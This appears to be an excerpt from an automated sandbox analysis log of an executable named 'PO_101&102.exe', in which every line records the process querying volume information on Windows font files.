          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
